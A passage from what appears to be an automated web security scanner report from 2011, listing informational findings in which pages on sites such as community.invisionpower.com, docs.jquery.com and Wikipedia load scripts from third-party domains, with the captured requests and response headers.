Set-Cookie: cforums_session_id=d2e2a5936e45fa12216e4abb2e8099c0; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:08:58 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:09:02 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNLa0rgVcMFxclgap; expires=Thu, 02-Feb-2012 23:09:02 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 120541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
</a>
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.9. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=3dad76b69e1b555f24f516aac0b3ef76; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:37 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:40 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzszC3tDS3rgVcMFxcmwax; expires=Thu, 02-Feb-2012 23:06:40 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 113185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
</a>
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.10. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:08:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=3089ab90376decdd064cc3c1ad3aedb3; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:08:03 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:08:06 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwsDC2rgVcMFxcxAaq; expires=Thu, 02-Feb-2012 23:08:06 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
</a>
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.11. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:05:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=3f24b040fc06af09c8715c79f1fc3550; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:05:34 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:05:40 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzszC3NDa1rgVcMFxcVgan; expires=Thu, 02-Feb-2012 23:05:40 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 87819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
</a>
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.12. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:09:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f9a523a5a6287c31acc7eeae45850db2; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:09:07 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:09:10 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwNLGwrgVcMFxc1wat; expires=Thu, 02-Feb-2012 23:09:10 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 68867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
</a>
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.13. http://creativecommons.org/licenses/by-nc-nd/3.0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creativecommons.org
Path:   /licenses/by-nc-nd/3.0/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /licenses/by-nc-nd/3.0/ HTTP/1.1
Host: creativecommons.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 20882
Date: Thu, 03 Feb 2011 01:01:55 GMT
X-Varnish: 2126179970 2126177545
Age: 20
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:cc="http://creativecommons.org/ns#"

...[SNIP]...
</script>


<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/json/json-min.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/container/container-min.js">
</script>
...[SNIP]...

17.14. http://creativecommons.org/licenses/by/2.5/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creativecommons.org
Path:   /licenses/by/2.5/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /licenses/by/2.5/ HTTP/1.1
Host: creativecommons.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 20826
Date: Thu, 03 Feb 2011 01:01:51 GMT
X-Varnish: 2126179549 2126173297
Age: 51
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:cc="http://creativecommons.org/ns#"

...[SNIP]...
</script>


<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/json/json-min.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/container/container-min.js">
</script>
...[SNIP]...

17.15. http://docs.jquery.com/UI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:24 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

17.16. http://docs.jquery.com/UI/Accordion  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Accordion

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Accordion HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:28 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

17.17. http://docs.jquery.com/UI/Mouse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Mouse

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Mouse HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:26 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

17.18. http://docs.jquery.com/UI/Slider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Slider

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Slider HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:29 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

17.19. http://docs.jquery.com/UI/Tabs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Tabs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Tabs HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:30 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

17.20. http://docs.jquery.com/UI/Widget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Widget

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Widget HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:25 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

17.21. http://en.wikipedia.org/wiki/Invision_Power_Board  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Invision_Power_Board

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/Invision_Power_Board HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 20:30:48 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Last-Modified: Thu, 27 Jan 2011 00:08:57 GMT
Content-Length: 41756
Content-Type: text/html; charset=UTF-8
Age: 16296
X-Cache: HIT from sq73.wikimedia.org
X-Cache-Lookup: HIT from sq73.wikimedia.org:3128
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

17.22. http://english.vietnamnet.vn/en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://english.vietnamnet.vn
Path:   /en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html HTTP/1.1
Host: english.vietnamnet.vn
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 01:01:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58692
X-Cache: MISS from Cache-48
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4cae93db4d7923db"></script>
...[SNIP]...

17.23. http://fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:54:33 GMT
Connection: close
Content-Length: 83533
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<td>                                                                                <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=68727f58-180b-4533-bb75-9095c2c1f7b7&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

17.24. http://googlenewsblog.blogspot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googlenewsblog.blogspot.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: googlenewsblog.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 01:02:47 GMT
Date: Thu, 03 Feb 2011 01:02:47 GMT
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Last-Modified: Mon, 31 Jan 2011 23:01:25 GMT
ETag: "00351c83-d0b7-467b-937a-79d53d1bc4e8"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmln
...[SNIP]...
</p>
<script src='http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAA8oTp_KDiJ7gFvDuWWFfolxRXv8ZRq0h3xKx1GIKoZrphwpQKfRREVU9C0Dk9CE_qlkLyVPKQVUhn_A' type='text/javascript'></script>
...[SNIP]...
</script>

<script src="http://www.google.com/reader/public/javascript/user/10949413115399023739/label/officialgoogleblogs-all?n=5&callback=build_posts" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/283664639-widgets.js"></script>
...[SNIP]...

17.25. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=8d6590cd6d6bae50:TM=1296694971:LM=1296694971:S=-Xvd35p4ZHDH2YL5; expires=Sat, 02-Feb-2013 01:02:51 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 01:02:51 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

17.26. http://ipboard-software.software.informer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipboard-software.software.informer.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: ipboard-software.software.informer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 01:02:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 17619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
</script>
                       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

17.27. http://jquery.andreaseberhard.de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
